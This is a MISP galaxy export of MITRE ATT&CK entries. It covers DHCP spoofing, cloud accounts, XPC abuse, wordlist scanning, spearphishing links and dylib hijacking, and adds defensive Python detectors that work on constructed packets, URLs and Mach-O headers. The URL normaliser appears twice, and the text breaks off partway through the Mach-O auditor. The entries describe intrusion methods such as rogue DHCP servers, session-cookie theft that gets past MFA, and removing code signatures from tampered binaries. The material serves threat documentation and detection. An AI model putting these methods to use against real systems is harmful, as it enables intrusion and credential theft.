Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).

DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.(Citation: rfc2131) The typical server-client interaction is as follows:

  1. The client broadcasts a DISCOVER message.

  2. The server responds with an OFFER message, which includes an available network address.

  3. The client broadcasts a REQUEST message, which includes the network address offered.

  4. The server acknowledges with an ACK message and the client receives the network configuration parameters.

Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.(Citation: new_rogue_DHCP_serv_malware)(Citation: w32.tidserv.g) Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.

DHCPv6 clients can receive network configuration information without being assigned an IP address by sending an <code>INFORMATION-REQUEST (code 11)</code> message to the <code>All_DHCP_Relay_Agents_and_Servers</code> multicast address.(Citation: rfc3315) Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.

Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e., [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool.
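The OFFER and ACK steps of the exchange above are where a rogue server injects its own gateway and DNS servers, so that is what a network monitor checks. As an added example (not code from the ATT&CK or MISP projects), the script below parses the DHCPv4 header and option area described in RFC 2131 and compares the server identifier (option 54), router (option 3) and DNS server (option 6) options against an allow-list; the packets are constructed in code rather than captured.

```python
"""Parse DHCPv4 replies and flag the ones a rogue server would produce.
Added example; packets are built in code, not captured from a network."""
import struct
from socket import inet_aton, inet_ntoa

MAGIC_COOKIE = b"\x63\x82\x53\x63"
MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 4: "DECLINE",
             5: "ACK", 6: "NAK", 7: "RELEASE", 8: "INFORM"}
OPT_SUBNET, OPT_ROUTER, OPT_DNS, OPT_LEASE, OPT_MSG_TYPE, OPT_SERVER_ID = 1, 3, 6, 51, 53, 54


def build_reply(msg_type: int, yiaddr: str, server_id: str, router: str, dns_servers, xid=0x3903F326) -> bytes:
    """Assemble a BOOTREPLY (op=2) with the options a DHCP server sends to a client."""
    header = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                         2, 1, 6, 0, xid, 0, 0x8000,          # op, htype, hlen, hops, xid, secs, flags
                         b"\0" * 4, inet_aton(yiaddr),        # ciaddr, yiaddr (address being offered)
                         inet_aton(server_id), b"\0" * 4,     # siaddr, giaddr
                         b"\0" * 16, b"\0" * 64, b"\0" * 128) # chaddr, sname, file
    opts = bytes([OPT_MSG_TYPE, 1, msg_type, OPT_SERVER_ID, 4]) + inet_aton(server_id)
    opts += bytes([OPT_SUBNET, 4]) + inet_aton("255.255.255.0")
    opts += bytes([OPT_ROUTER, 4]) + inet_aton(router)
    opts += bytes([OPT_DNS, 4 * len(dns_servers)]) + b"".join(inet_aton(d) for d in dns_servers)
    opts += bytes([OPT_LEASE, 4]) + struct.pack("!I", 86400)
    return header + MAGIC_COOKIE + opts + b"\xff"           # 0xff = End option


def _ip_list(raw: bytes) -> list:
    return [inet_ntoa(raw[j:j + 4]) for j in range(0, len(raw) - len(raw) % 4, 4)]


def parse_dhcp(pkt: bytes) -> dict:
    """Decode the fixed 236-byte BOOTP header, the magic cookie and the TLV options."""
    if len(pkt) < 240 or pkt[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet")
    op, _htype, _hlen, _hops, xid, _secs, _flags = struct.unpack("!BBBBIHH", pkt[:12])
    options, i = {}, 240
    while i < len(pkt):
        code = pkt[i]
        if code == 255:                  # End
            break
        if code == 0:                    # Pad: single byte, no length
            i += 1
            continue
        if i + 1 >= len(pkt):            # truncated option header
            break
        length = pkt[i + 1]
        options[code] = pkt[i + 2:i + 2 + length]
        i += 2 + length
    server_raw = options.get(OPT_SERVER_ID, b"")
    return {
        "op": "BOOTREPLY" if op == 2 else "BOOTREQUEST",
        "xid": xid,
        "yiaddr": inet_ntoa(pkt[16:20]),
        "msg_type": MSG_TYPES.get((options.get(OPT_MSG_TYPE) or b"\0")[0], "UNKNOWN"),
        "server_id": inet_ntoa(server_raw) if len(server_raw) == 4 else None,
        "routers": _ip_list(options.get(OPT_ROUTER, b"")),
        "dns": _ip_list(options.get(OPT_DNS, b"")),
    }


def check_reply(info: dict, authorized_servers, expected_dns, expected_routers) -> list:
    """Findings for an OFFER/ACK that did not come from, or does not match, our DHCP policy."""
    findings = []
    if info["op"] != "BOOTREPLY" or info["msg_type"] not in ("OFFER", "ACK"):
        return findings
    if info["server_id"] not in authorized_servers:
        findings.append(f"{info['msg_type']} from unauthorised DHCP server {info['server_id']}")
    for d in info["dns"]:
        if d not in expected_dns:
            findings.append(f"unexpected DNS server {d} pushed to client {info['yiaddr']}")
    for r in info["routers"]:
        if r not in expected_routers:
            findings.append(f"unexpected default gateway {r} pushed to client {info['yiaddr']}")
    return findings


# Constructed policy for a lab /24: one real DHCP server, two resolvers, one gateway.
POLICY = dict(authorized_servers={"192.168.1.1"}, expected_dns={"192.168.1.1", "192.168.1.2"},
              expected_routers={"192.168.1.1"})

if __name__ == "__main__":
    rogue = build_reply(2, "192.168.1.50", "192.168.1.66", "192.168.1.66", ["192.168.1.66"])
    for line in check_reply(parse_dhcp(rogue), **POLICY):
        print(line)
```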

The tag is: misp-galaxy:mitre-attack-pattern="DHCP Spoofing - T1557.003"

Table 6129. Table References

Links

https://attack.mitre.org/techniques/T1557/003

https://datatracker.ietf.org/doc/html/rfc2131

https://datatracker.ietf.org/doc/html/rfc3315

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800668(v=ws.11)

https://isc.sans.edu/forums/diary/new+rogueDHCP+server+malware/6025/

https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/

https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2

Cloud Accounts - T1585.003

Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)

Creating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003) may also require adversaries to establish [Email Accounts](https://attack.mitre.org/techniques/T1585/002) to register with the cloud provider.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1585.003"

Table 6130. Table References

Links

https://attack.mitre.org/techniques/T1585/003

https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/

XPC Services - T1559.003

Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high-level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications with stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)

Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application’s XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

The tag is: misp-galaxy:mitre-attack-pattern="XPC Services - T1559.003"

Table 6131. Table References

Links

https://attack.mitre.org/techniques/T1559/003

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html

https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/

https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html

Wordlist Scanning - T1595.003

Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591), or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).

For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.(Citation: ClearSky Lebanese Cedar Jan 2021) This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [Brute Force](https://attack.mitre.org/techniques/T1110)).

As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.(Citation: S3Recon GitHub)(Citation: GCPBucketBrute) Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally.

The tag is: misp-galaxy:mitre-attack-pattern="Wordlist Scanning - T1595.003"

Table 6132. Table References

Links

https://attack.mitre.org/techniques/T1595/003

https://github.com/clarketm/s3recon

https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/

https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

Cloud Accounts - T1586.003

Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)

A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1586.003"

Table 6133. Table References

Links

https://attack.mitre.org/techniques/T1586/003

https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/

https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/

DNS Calculation - T1568.003

Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. An IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)

One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)

The tag is: misp-galaxy:mitre-attack-pattern="DNS Calculation - T1568.003"

Table 6134. Table References

Links

http://www.crowdstrike.com/blog/whois-numbered-panda/

https://attack.mitre.org/techniques/T1568/003

https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

Web Services - T1583.006

Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.

The tag is: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006"

Table 6135. Table References

Links

https://attack.mitre.org/techniques/T1583/006

https://threatconnect.com/blog/infrastructure-research-hunting/

Digital Certificates - T1596.003

Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.

Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: the certificates used for encrypted web traffic are served along with the content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1596.003"

Table 6136. Table References

Links

https://attack.mitre.org/techniques/T1596/003

https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2

https://www.sslshopper.com/ssl-checker.html

Digital Certificates - T1587.003

Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).

Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).

After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.

The tag is: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1587.003"

Table 6137. Table References

Links

https://attack.mitre.org/techniques/T1587/003

https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Employee Names - T1589.003

Adversaries may gather employee names that can be used during targeting. Employee names can be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.

Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Employee Names - T1589.003"

Table 6138. Table References

Links

https://attack.mitre.org/techniques/T1589/003

https://www.opm.gov/cybersecurity/cybersecurity-incidents/

Spearphishing Link - T1598.003

Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, hxxp://google.com@1157586937.(Citation: Mandiant URL Obfuscation 2023)
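The hxxp://google.com@1157586937 lure above combines two of the URL quirks named: the text before "@" is userinfo that browsers discard, and the host is a single decimal integer. A mail filter or triage script should normalise such URLs before comparing the real destination with what the victim reads. The following is an added example, not code from the ATT&CK or MISP projects; it undoes the hxxp defang, separates the userinfo decoy from the effective host, and decodes the decimal, hex and octal IPv4 spellings browsers accept. The sample URLs are constructed.

```python
"""Normalise a lure URL: what the victim sees versus where the browser goes.
Added example; sample URLs are constructed."""
import ipaddress
import re
from urllib.parse import urlsplit


def refang(url: str) -> str:
    """Turn analyst defanging (hxxp, [.], [:]) back into a parsable URL."""
    url = re.sub(r"^hxxps?(?=:)", lambda m: m.group(0).lower().replace("xx", "tt"), url, flags=re.I)
    return url.replace("[.]", ".").replace("[:]", ":")


def _ipv4_part(text: str) -> int:
    """One dotted component in the hex (0x44), octal (0104) or decimal form browsers accept."""
    if text[:2].lower() == "0x":
        return int(text[2:], 16)
    if len(text) > 1 and text[0] == "0":
        return int(text, 8)
    return int(text, 10)


def decode_numeric_host(host: str):
    """Return a dotted quad if the host is an IPv4 address in any legacy spelling
    (1157586937, 0x44ff5ff9, 0x44.0xff.0x5f.0xf9, 0104.0377.0137.0371), else None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or "" in parts:
        return None
    try:
        nums = [_ipv4_part(p) for p in parts]
    except ValueError:
        return None
    tail_bits = 8 * (5 - len(parts))            # the last part fills the remaining bytes
    if any(not 0 <= n <= 255 for n in nums[:-1]) or not 0 <= nums[-1] < (1 << tail_bits):
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << tail_bits) | nums[-1]
    return str(ipaddress.IPv4Address(value))


def analyse_url(url: str) -> dict:
    """Separate the decoy text from the effective host and tag the tricks used."""
    parts = urlsplit(refang(url))
    real_host = parts.hostname or ""             # urlsplit already drops userinfo and port
    decoded = decode_numeric_host(real_host)
    findings = []
    if url.lower().startswith("hxxp"):
        findings.append("defanged-input")
    if parts.username is not None:
        findings.append("userinfo-before-@")     # "google.com@" is silently dropped by the browser
    if decoded and decoded != real_host:
        findings.append("numeric-host-encoding")
    return {
        "lure_text": parts.username,             # what the victim is meant to read as the site name
        "effective_host": decoded or real_host,  # what DNS/TCP will actually be asked for
        "path": parts.path or "/",
        "findings": findings,
    }


# Constructed samples: the lure from the text, two re-spellings of the same host,
# and a genuine login URL for comparison.
SAMPLES = [
    "hxxp://google.com@1157586937",
    "http://0x44.0xff.0x5f.0xf9/login",
    "http://0104.0377.0137.0371/",
    "https://accounts.google.com/signin",
]

if __name__ == "__main__":
    for s in SAMPLES:
        r = analyse_url(s)
        print(f"{s:40} -> host {r['effective_host']:18} decoy {r['lure_text']!s:12} {r['findings']}")
```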

Adversaries may also link to "web bugs" or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug)

Adversaries may also be able to spoof a complete website using what is known as a "browser-in-the-browser" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)

Adversaries can use phishing kits such as EvilProxy and Evilginx2 to proxy the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004).(Citation: Proofpoint Human Factor)

From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
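The URL-schema quirks described above (an integer or hexadecimal hostname, and text before an "@" that the browser discards as userinfo) are cheap to normalize before a link is compared against a block list or shown to an analyst. The following is an added example, not code from the MISP project or from the ATT&CK entry: it resolves a single-integer host (decimal, `0x` hex, or leading-zero octal) to dotted-quad form and reports the userinfo decoy. The handling of the defanged `hxxp` prefix and the `login.example.com` control case are assumptions for this example; `google.com@1157586937` is the page's own sample.

```python
import ipaddress
from urllib.parse import urlsplit


def decode_numeric_host(host):
    """Resolve a host written as one integer (decimal, 0x-hex, or leading-zero
    octal) to dotted-quad form; return None for ordinary hostnames or
    out-of-range values. Dotted mixed-radix forms (e.g. 0x44.255.0137.249)
    are not handled here."""
    try:
        h = host.lower()
        if h.startswith("0x"):
            n = int(h, 16)
        elif h.isdigit():
            n = int(h, 8) if len(h) > 1 and h.startswith("0") else int(h, 10)
        else:
            return None
        return str(ipaddress.IPv4Address(n))
    except ValueError:  # AddressValueError is a ValueError subclass
        return None


def analyze_url(url):
    """Report what a browser will actually connect to, versus what the text
    before '@' makes the reader believe."""
    cleaned = url
    if cleaned.lower().startswith("hxxp"):  # defanged form used in threat reports (assumed input style)
        cleaned = "http" + cleaned[4:]
    parts = urlsplit(cleaned)
    host = parts.hostname or ""       # urlsplit already strips userinfo and port
    numeric = decode_numeric_host(host)
    findings = []
    if parts.username is not None:
        findings.append(f"text before '@' ({parts.username!r}) is userinfo, not the host")
    if numeric is not None:
        findings.append(f"integer host {host!r} is {numeric}")
    return {
        "displayed_lure": parts.username,   # what the victim was meant to read
        "effective_host": numeric or host,  # what the connection goes to
        "findings": findings,
        "suspicious": bool(findings),
    }


if __name__ == "__main__":
    # Constructed inputs: the page's sample plus a hex variant and a benign control.
    for sample in ("hxxp://google.com@1157586937", "https://0x44FF5FF9/login",
                   "https://login.example.com/"):
        print(sample, "->", analyze_url(sample))
```

Run it against links extracted from a reported message; a result with `suspicious` set and an `effective_host` that differs from the `displayed_lure` is the pattern the paragraph describes.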

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003"

Table 6139. Table References

Links

https://attack.mitre.org/techniques/T1598/003

https://csrc.nist.gov/glossary/term/web_bug

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

https://mrd0x.com/browser-in-the-browser-phishing-attack/

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse

https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages

https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-human-factor-report.pdf

https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html

https://www.zscaler.com/blogs/security-research/fake-sites-stealing-steam-credentials

Dylib Hijacking - T1574.004

Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as via the <code>LC_LOAD_WEAK_DYLIB</code> load command, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.

Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application’s address space allowing the malicious dylib to inherit the application’s privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)

The tag is: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1574.004"

Table 6140. Table References

Links

https://attack.mitre.org/techniques/T1574/004

https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py

https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py

https://malwareunicorn.org/workshops/macos_dylib_injection.html#5

https://objective-see.com/blog/blog_0x46.html

https://taomm.org/vol1/pdfs.html

https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf

https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf

LC_LOAD_DYLIB Addition - T1546.006

Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.

Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
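Both the Dylib Hijacking entry above (search order, <code>@rpath</code>, weak linking) and this LC_LOAD_DYLIB Addition entry (added load commands, a removed <code>LC_CODE_SIGNATURE</code>) come down to what is in a binary's load-command table, which a defender can read directly. The following is an added example, not code from the MISP project, from ATT&CK, or from any tool cited on the page: it walks the load commands of a little-endian 64-bit Mach-O, lists every <code>LC_LOAD_DYLIB</code> / <code>LC_LOAD_WEAK_DYLIB</code> path, expands <code>@rpath</code> references against the <code>LC_RPATH</code> list in search order, and records whether an <code>LC_CODE_SIGNATURE</code> command is present. The sample image is constructed in the block itself (a header plus three load commands, not a real executable); the constant values are the ones from Apple's <code>&lt;mach-o/loader.h&gt;</code>.

```python
import struct

# Mach-O constants from <mach-o/loader.h>. Only little-endian 64-bit thin
# images are handled; fat/universal and 32-bit headers are out of scope here.
MH_MAGIC_64 = 0xFEEDFACF
LC_REQ_DYLD = 0x80000000
LC_LOAD_DYLIB = 0x0C
LC_LOAD_WEAK_DYLIB = 0x18 | LC_REQ_DYLD
LC_RPATH = 0x1C | LC_REQ_DYLD
LC_CODE_SIGNATURE = 0x1D
HEADER_FMT = "<IiiIIIII"  # magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags, reserved
HEADER_LEN = struct.calcsize(HEADER_FMT)


def parse_load_commands(blob):
    """Walk the load-command table and return [(cmd, raw_command_bytes), ...]."""
    if len(blob) < HEADER_LEN:
        raise ValueError("too short for a Mach-O header")
    magic, _, _, _, ncmds, sizeofcmds, _, _ = struct.unpack_from(HEADER_FMT, blob, 0)
    if magic != MH_MAGIC_64:
        raise ValueError("not a little-endian 64-bit Mach-O")
    off, end, cmds = HEADER_LEN, HEADER_LEN + sizeofcmds, []
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", blob, off)
        if cmdsize < 8 or off + cmdsize > end:
            raise ValueError("malformed load command")  # truncated or overlapping table
        cmds.append((cmd, blob[off:off + cmdsize]))
        off += cmdsize
    return cmds


def _lc_str(raw):
    """Read an lc_str: a uint32 offset at byte 8, relative to the command start."""
    name_off = struct.unpack_from("<I", raw, 8)[0]
    return raw[name_off:].split(b"\0", 1)[0].decode()


def audit_dylib_loads(blob):
    """Summarise which dylibs the loader will look for, how, and whether the
    image still carries a code-signature command."""
    report = {"dylibs": [], "weak": [], "rpath_refs": [], "rpaths": [], "code_signature": False}
    for cmd, raw in parse_load_commands(blob):
        if cmd in (LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB):
            path = _lc_str(raw)
            report["dylibs"].append(path)
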